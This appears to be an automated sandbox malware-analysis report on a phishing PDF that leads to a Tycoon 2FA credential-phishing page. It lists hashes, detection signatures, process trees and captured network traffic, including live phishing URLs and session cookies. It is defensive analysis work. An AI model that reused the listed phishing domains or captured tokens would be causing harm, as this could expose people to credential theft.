Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
PAD_[2025-03-24_120914].pdf

Overview

General Information

Sample name:PAD_[2025-03-24_120914].pdf
Analysis ID:1647920
MD5:e39a4016cd760a85e9d89cce8a671a26
SHA1:a2a3783575261cee4be15ad615edd9c00c20a435
SHA256:64950941c354bdbfca84606d3e07b59c58d348b9145e2ff6b7899e68a164886b
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Acrobat.exe (PID: 5996 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\PAD_[2025-03-24_120914].pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 3608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1564,i,11632145460416929196,16659529241045373654,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 3276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,4995324151274368739,4250573970443959080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_183JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.4.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.2.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.2.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
            0.5..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              • AV Detection
              • Phishing
              • Compliance
              • Networking
              • System Summary
              • Hooking and other Techniques for Hiding and Protection
              • Malware Analysis System Evasion

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://sallybarmescounsellor.co.uk/pad4.pdfAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_183, type: DROPPED
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.5..script.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.4.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.2.d.script.csv, type: HTML
              Source: 0.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://uz5k.vsmaemhjvk.ru/vHFigT/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://uz5k.vsmaemhjvk.ru/vHFigT/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent.
              Source: https://uz5k.vsmaemhjvk.ru/vHFigT/HTTP Parser: No favicon
              Source: https://uz5k.vsmaemhjvk.ru/vHFigT/HTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewIP Address: 185.199.220.71 185.199.220.71
              Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
              Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.131
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
              Source: unknownTCP traffic detected without corresponding DNS query: 20.191.45.158
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pad4.pdf HTTP/1.1Host: sallybarmescounsellor.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vHFigT/ HTTP/1.1Host: uz5k.vsmaemhjvk.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://uz5k.vsmaemhjvk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: uz5k.vsmaemhjvk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uz5k.vsmaemhjvk.ru/vHFigT/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InI5VHgxa1VVVG00aVJPRXdVTk1LSnc9PSIsInZhbHVlIjoiS3g3V0hyMFBhRlVHVmV2MThlWHM0ZVhRK2Nway9JQ1kzN094RWU2TllQbTZCMEFyYlZFWUJPLzgyNDRaZEV4QURRUkNydDJIUHRDaUdWUnBlSmNzbSs5WEdBOUgyVEF2VjdGVlF3QXBqZmNoT0lWaVNHamd5YXVQKzJHMzVPRTkiLCJtYWMiOiJlZWRjMjMzZTMzNTMyYzUxMDI4MDc0ZTMwYjZjYjQ0NWQyNmI0MTQ3YmVhOTFiN2MzY2E4OWQ0OWE2OTU4OTg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBVN0syMElCOGNwM055NjI5WTZJL3c9PSIsInZhbHVlIjoiSTEwSytnYmdBdnZ2ZTFVUEZicUUvc21FUnNad2ZkeGJZaFhVem5YZVN0Wm01cWlLckFZTWdzdFZxb1ZxNEpHY1hXM3JGbDRyZ05JT1VVQlZuUmJObTJFV1I0d0UwSk13Z05MYmR5U0psaWJ1aHJPc1JDeTFDdjcvNjNsUVpLU0YiLCJtYWMiOiJlNDVjODUyNjBkNzcyMzA0ZmFhNjM0NjNhNjhhMWUxYmMwM2VmMGQ4OWE0YjcwYWUwMTdkNmZmODMzOThkNzljIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
              Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
              Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: sallybarmescounsellor.co.uk
              Source: global trafficDNS traffic detected: DNS query: uz5k.vsmaemhjvk.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: unknownHTTP traffic detected: POST /report/v4?s=jJGU1M2lQdLPBLsmF3S9f5WaiYuhkTZcoDYAC5firLcfp%2FJW6VvEmvVmUsP7j4F7xeno8yvNku3SgddcT4bah1xsnNJu6jh7hOk1ISm6bmaIeaLaYMea%2BdtnbrlG HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 431Content-Type: application/reports+jsonOrigin: https://uz5k.vsmaemhjvk.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 10:54:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJGU1M2lQdLPBLsmF3S9f5WaiYuhkTZcoDYAC5firLcfp%2FJW6VvEmvVmUsP7j4F7xeno8yvNku3SgddcT4bah1xsnNJu6jh7hOk1ISm6bmaIeaLaYMea%2BdtnbrlG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=16420&min_rtt=16375&rtt_var=4634&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2235&delivery_rate=246465&cwnd=242&unsent_bytes=0&cid=a3bd80c0cebde74f&ts=215&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925ddea718bd432b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99344&min_rtt=99271&rtt_var=21052&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1901&delivery_rate=37445&cwnd=233&unsent_bytes=0&cid=5a24554dda09c625&ts=503&x=0"
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.drString found in binary or memory: http://x1.i.lencr.org/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir3276_1781714645Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir3276_1781714645Jump to behavior
              Source: classification engineClassification label: mal92.phis.evad.winPDF@40/54@11/8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-25 06-53-47-946.logJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\PAD_[2025-03-24_120914].pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1564,i,11632145460416929196,16659529241045373654,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,4995324151274368739,4250573970443959080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1564,i,11632145460416929196,16659529241045373654,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,4995324151274368739,4250573970443959080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: PAD_[2025-03-24_120914].pdfInitial sample: PDF keyword /JS count = 0
              Source: PAD_[2025-03-24_120914].pdfInitial sample: PDF keyword /JavaScript count = 0
              Source: A913q1c4i_netyvb_3s4.tmp.0.drInitial sample: PDF keyword /JS count = 0
              Source: A913q1c4i_netyvb_3s4.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
              Source: PAD_[2025-03-24_120914].pdfInitial sample: PDF keyword /EmbeddedFile count = 0
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
